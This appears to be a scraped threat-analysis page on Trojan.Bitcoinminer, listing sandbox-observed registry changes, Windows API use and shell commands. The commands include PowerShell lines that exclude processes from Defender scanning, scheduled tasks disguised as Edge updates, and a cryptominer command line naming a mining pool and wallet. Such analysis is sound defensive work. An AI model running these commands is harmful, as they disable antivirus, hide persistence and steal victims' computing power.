HKCU\software\axtkjpwe::a2_7	뎼䪩	RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_7	݇䮻	RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_7	꾣䪩	RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_8	봉⧺	RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_8	ೞ쌋	RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_8	몈숙	RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_8	ቬ쌋	RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_0	윣렴	RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_0	♄	RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_0	ꢀĒ	RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_0	d	RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_1	衡႓	RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_1	将杰	RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_1	틂晢	RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_1	稦杰	RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_2	ꮦ؃	RegNtPreCreateKey
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list::c:\users\user\downloads\e6c49ad89c5d0476d967ce8ff3ebe1005bd10d1b_0000041863	c:\users\user\downloads\e6c49ad89c5d0476d967ce8ff3ebe1005bd10d1b_0000041863:*:Enabled:ipsec	RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_2	틀컠	RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_2	射쿲	RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_2	컠	RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_3	㧤牟	RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_3	䢂㙑	RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_3	왆㝃	RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_3	溢㙑	RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_4	鵲펆	RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_4	鷁	RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_4	䆈鳓	RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_4	鷁	RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_5		RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_5	䞅Բ	RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_5	쯊Р	RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_5	挮Բ	RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_6	ᣤ鹫	RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_6	﯈沢	RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_6	甌涰	RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_6		RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_7	읰嘂	RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_7	䮵퐓	RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_7	ｎ픁	RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_7	垪퐓	RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_8	紑텲	RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_8	쳆㮃	RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_8	窐㪑	RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_8	퉴㮃	RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_0	윣렴	RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_0	♄	RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_0	ꢀĒ	RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_0	d	RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_1	鵥֎	RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_1	䤂牭	RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_1	쟆獿	RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_1	漢牭	RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_2	膮ⰹ	RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_2		RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_2	瘌	RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_2		RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_3	᫰ፆ	RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_3	殖坈	RegNtPreCreateKey
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list::c:\users\user\downloads\f4e1698474aaf2848319904dcb4aaf6a9587ad58_0000038090	c:\users\user\downloads\f4e1698474aaf2848319904dcb4aaf6a9587ad58_0000038090:*:Enabled:ipsec	RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_3	噚	RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_3	䶶坈	RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_4	쥢蟲	RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_4	ꗏ즵	RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_4	ᖘ좧	RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_4	뵼즵	RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_5	韾⢊	RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_5	࢑㰣	RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_5	蓞㴱	RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_5	ⰺ㰣	RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_6	廌屙	RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_6	뷠꺐	RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_6	㌤꾂	RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_6	鯀꺐	RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_7	驔ꋯ	RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_7	ᚑ⃾	RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_7	ꉪ⇬	RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_7	઎⃾	RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_8	픱禚	RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_8	擦鍫	RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_8	튰鉹	RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_8	穔鍫	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe		RegNtPreCreateKey
HKLM\software\microsoft\systemcertificates\authroot\certificates\afe5d244a8d1194230ff479fe2f897bbcd7a8cb4::blob	ㄛ熰㙀ᓌ鄶쒭﴾ᣬ0ᙶ蛍倇㶌དྷﺾ睨㔷珼潴ꥂ拽메爻Ӱ鑹꿥杗쇒妖隄 T到ࠆثԁ܅ȃࠆثԁ܅̃ਆثЁ舁਷Ѓࠆثԁ܅Ѓࠆثԁ܅؃ࠆثԁ܅܃ࠆثԁ܅ăࠆثԁ܅ࠃSC䄰∰ఆثЁ눁ıĂąሰူਆثЁ舁㰷āȃ쀀ᬰԆ腧Č〃〒ؐ⬊ĆĄ㞂	RegNtPreCreateKey
HKLM\software\microsoft\systemcertificates\authroot\certificates\afe5d244a8d1194230ff479fe2f897bbcd7a8cb4::blob	\ကↂﮏ玑搾欓燥垟ꇃ䓒톨䈙Ｐ齇뮗竍뒌㧋퓃Ⱗ揟乷렝씐麨꾻ɾ悔萼궎㣮㋙퐲b 쓡軥⧆ᬩㅠݿ煆嶸꡾嬍✇挴䭓됲㐂:Sectigo (formerly Comodo CA)S	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	酨訵ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	嗉訵ǜ	RegNtPreCreateKey
HKCU\software\ej-technologies\exe4j\pids::c:\users\user\downlo~1\5b03f2~1	ᢔ	RegNtPreCreateKey
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list::c:\users\user\downloads\04f49b62291df27003be9756d79530844c0cc8c3_0000044223	c:\users\user\downloads\04f49b62291df27003be9756d79530844c0cc8c3_0000044223:*:Enabled:ipsec	RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_0	윣렴	RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_0	♄	RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_0	ꢀĒ	RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_0	d	RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_1	饯ᖎ	RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_1	䴈扭	RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_1	쏌捿	RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_1	欨扭	RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_2	覺హ	RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_2	쓚	RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_2	縘었	RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_2	훼쓚	RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_3	ᛆ捆	RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_3	枠❈	RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_3	♚	RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_3	䆀❈	RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_4		RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_4	뗧覵	RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_4	ְ袧	RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_4	굔覵	RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_5	ꏜ	RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_5	㲳	RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_5	냼	RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_5	᠘	RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_6	䚠뱙	RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_6	ꖌ亐	RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_6	⭈侂	RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_6	莬亐	RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_7	羪㋬	RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_7	냽	RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_7	䞔뇯	RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_7	냽	RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_8	連	RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_8	䒶፫	RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_8	ቹ	RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_8	娄፫	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	厷阭ǜ	RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\tracing::enableconsoletracing		RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\tracing\rasapi32::enablefiletracing		RegNtPreCreateKey

30 additional registry modifications are not displayed above.

Windows API Usage

Category	API
Anti Debug	IsDebuggerPresent NtQuerySystemInformation OutputDebugString
User Data Access	GetComputerName GetComputerNameEx GetUserDefaultLocaleName GetUserName GetUserNameEx GetUserObjectInformation OpenClipboard
Syscall Use	ntdll.dll!NtAccessCheck ntdll.dll!NtAddAtomEx ntdll.dll!NtAdjustPrivilegesToken ntdll.dll!NtAlertThreadByThreadId ntdll.dll!NtAllocateLocallyUniqueId ntdll.dll!NtAlpcConnectPort ntdll.dll!NtAlpcConnectPortEx ntdll.dll!NtAlpcCreatePortSection ntdll.dll!NtAlpcCreateResourceReserve ntdll.dll!NtAlpcCreateSectionView Show More ntdll.dll!NtAlpcCreateSecurityContext ntdll.dll!NtAlpcDeleteSecurityContext ntdll.dll!NtAlpcQueryInformation ntdll.dll!NtAlpcQueryInformationMessage ntdll.dll!NtAlpcSendWaitReceivePort ntdll.dll!NtAlpcSetInformation ntdll.dll!NtApphelpCacheControl ntdll.dll!NtAssociateWaitCompletionPacket ntdll.dll!NtCancelTimer2 ntdll.dll!NtCancelWaitCompletionPacket ntdll.dll!NtClearEvent ntdll.dll!NtClose ntdll.dll!NtCompareSigningLevels ntdll.dll!NtConnectPort ntdll.dll!NtCreateEvent ntdll.dll!NtCreateFile ntdll.dll!NtCreateIoCompletion ntdll.dll!NtCreateKey ntdll.dll!NtCreateMailslotFile ntdll.dll!NtCreateMutant ntdll.dll!NtCreatePrivateNamespace ntdll.dll!NtCreateSection ntdll.dll!NtCreateSemaphore ntdll.dll!NtCreateThreadEx ntdll.dll!NtCreateTimer ntdll.dll!NtCreateTimer2 ntdll.dll!NtCreateWaitCompletionPacket ntdll.dll!NtCreateWorkerFactory ntdll.dll!NtDelayExecution ntdll.dll!NtDeleteValueKey ntdll.dll!NtDeviceIoControlFile ntdll.dll!NtDuplicateObject ntdll.dll!NtDuplicateToken ntdll.dll!NtEnumerateKey ntdll.dll!NtEnumerateValueKey ntdll.dll!NtFlushBuffersFile ntdll.dll!NtFlushProcessWriteBuffers ntdll.dll!NtFreeVirtualMemory ntdll.dll!NtFsControlFile ntdll.dll!NtGetCachedSigningLevel ntdll.dll!NtGetCompleteWnfStateSubscription ntdll.dll!NtGetNlsSectionPtr ntdll.dll!NtLoadKeyEx ntdll.dll!NtLockFile ntdll.dll!NtMapViewOfSection ntdll.dll!NtNotifyChangeKey ntdll.dll!NtOpenDirectoryObject ntdll.dll!NtOpenEvent ntdll.dll!NtOpenFile ntdll.dll!NtOpenKey ntdll.dll!NtOpenKeyEx ntdll.dll!NtOpenMutant ntdll.dll!NtOpenProcess ntdll.dll!NtOpenProcessToken ntdll.dll!NtOpenProcessTokenEx ntdll.dll!NtOpenSection ntdll.dll!NtOpenSemaphore ntdll.dll!NtOpenSymbolicLinkObject ntdll.dll!NtOpenThread ntdll.dll!NtOpenThreadToken ntdll.dll!NtOpenThreadTokenEx ntdll.dll!NtPowerInformation ntdll.dll!NtProtectVirtualMemory ntdll.dll!NtQueryAttributesFile ntdll.dll!NtQueryDebugFilterState ntdll.dll!NtQueryDefaultLocale ntdll.dll!NtQueryDirectoryFileEx ntdll.dll!NtQueryEvent ntdll.dll!NtQueryFullAttributesFile ntdll.dll!NtQueryInformationFile ntdll.dll!NtQueryInformationJobObject ntdll.dll!NtQueryInformationProcess ntdll.dll!NtQueryInformationThread ntdll.dll!NtQueryInformationToken ntdll.dll!NtQueryKey ntdll.dll!NtQueryLicenseValue ntdll.dll!NtQueryObject ntdll.dll!NtQueryPerformanceCounter ntdll.dll!NtQuerySecurityAttributesToken ntdll.dll!NtQuerySecurityObject ntdll.dll!NtQuerySymbolicLinkObject ntdll.dll!NtQuerySystemInformation ntdll.dll!NtQuerySystemInformationEx ntdll.dll!NtQueryValueKey ntdll.dll!NtQueryVirtualMemory ntdll.dll!NtQueryVolumeInformationFile ntdll.dll!NtQueryWnfStateData ntdll.dll!NtQueueApcThread ntdll.dll!NtQueueApcThreadEx2 ntdll.dll!NtReadFile 172 additional items are not displayed above.
Process Shell Execute	CreateProcess
Encryption Used	BCryptOpenAlgorithmProvider CryptAcquireContext
Other Suspicious	AdjustTokenPrivileges
Network Winsock2	WSAConnect WSARecv WSASend WSASocket WSAStartup WSAttemptAutodialName
Network Winsock	bind closesocket freeaddrinfo getaddrinfo gethostname recv send setsockopt socket
Network Info Queried	GetAdaptersAddresses GetNetworkParams
Service Control	OpenSCManager OpenService StartServiceCtrlDispatcher
Network Wininet	InternetOpen InternetOpenUrl InternetReadFile
Keyboard Access	GetKeyState
Process Manipulation Evasion	NtUnmapViewOfSection ReadProcessMemory VirtualAllocEx
Network Urlomon	URLDownloadToFile
Cert Store Read	CertEnumCertificatesInStore CertOpenStore
Cert Store Write	CertAddEncodedCertificateToStore
Process Terminate	TerminateProcess
Network Winhttp	WinHttpOpen

Shell Command Execution


							powershell -Command "Add-MpPreference -ExclusionProcess 'powershell.exe'"


							c:\users\user\downloads\Altruistics.exe "c:\users\user\downloads\Altruistics.exe" "-u" "-g" ":\sandbox_live\SandboxTool.exe"


							C:\Windows\Microsoft.NET\Framework64\v2.0.50727\\dw20.exe dw20.exe -x -s 708


							D:\Windows Files 381.529\xmrig.exe (NULL)


							D:\Windows Files 381.529\Windows Files Manager User mode.exe (NULL)


									schtasks.exe /create /f /RL HIGHEST /sc onlogon /tn "MicrosoftEdgeUpdateTaskMachineCoreUE" /tr "rundll32.exe C:\Windows\System32\vcruntime143_threads.dll,Update"


									schtasks.exe /create /f /RL HIGHEST /sc hourly /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUI" /tr "rundll32.exe C:\Windows\System32\vcruntime143_threads.dll,Update"


									schtasks /delete /f /tn "MicrosoftEdgeUpdateTaskMachineCoreUO"


									C:\Users\Lueocmoq\AppData\Local\Temp\temp_script.bat


									C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell  -Command "Add-MpPreference -ExclusionProcess 'C:\\*'"


									C:\WINDOWS\system32\cmd.exe /C for %I in ("c:\Users\user\downloads\5b03f261746e2d03b295054a22829f6308cb5391_0000304112") do @echo %~sI


									"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Jebndjsj\AppData\Local\Temp\h6q_mxj7.cmdline"


									C:\Windows\System32\RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe  -o pool.hashvault.pro:443 -u 43r3UGUXLLqSb6fxHttvTsRujqbxZ1pbxcjd5W6EUJhuGBrkWFsEAfKj87E6LRLGXbX96GwdydczP4JapRrtsipkGp2PVjC -p BotNet --tls --cpu-max-threads-hint=30


									C:\Windows\System32\RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe  -o pool.hashvault.pro:443 -u 43r3UGUXLLqSb6fxHttvTsRujqbxZ1pbxcjd5W6EUJhuGBrkWFsEAfKj87E6LRLGXbX96GwdydczP4JapRrtsipkGp2PVjC -p BotNet --tls --cpu-max-threads-hint=91

Trojan.Bitcoinminer

Threat Scorecard

EnigmaSoft Threat Scorecard

How Trojan.Bitcoinminer may be Delivered

The Trojan.Bitcoinminer Infection and Its Related Symptoms

General Recommendations Related to Trojan.Bitcoinminer

SpyHunter Detects & Remove Trojan.Bitcoinminer

File System Details

Registry Details

Directories

Analysis Report

General information

Known Samples

Known Samples

Windows Portable Executable Attributes

Windows Portable Executable Attributes

File Icons

File Icons

Windows PE Version Information

Windows PE Version Information

Digital Signatures

Digital Signatures

File Traits

Block Information

Block Information

Visual Map

Similar Families

Similar Families

Files Modified

Files Modified

Registry Modifications

Registry Modifications

Windows API Usage

Windows API Usage

Shell Command Execution

Shell Command Execution

Submit Comment

Related Posts

Trending

Most Viewed